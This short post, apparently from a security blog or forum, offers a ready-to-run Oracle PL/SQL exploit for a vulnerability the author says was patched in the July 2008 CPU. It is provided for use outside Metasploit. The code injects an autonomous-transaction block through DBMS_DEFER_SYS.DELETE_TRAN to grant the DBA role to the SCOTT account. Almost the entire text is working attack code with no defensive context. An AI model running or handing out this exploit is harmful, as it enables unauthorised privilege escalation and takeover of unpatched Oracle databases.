The exploit for this vulnerability is in metasploit, but i could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008
So, if you need to use it outside metasploit, here it is:
DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
DBMS_DEFER_SYS.DELETE_TRAN('aaaaaa','a'' and dbms_sql.execute('||D||')=1--');
end;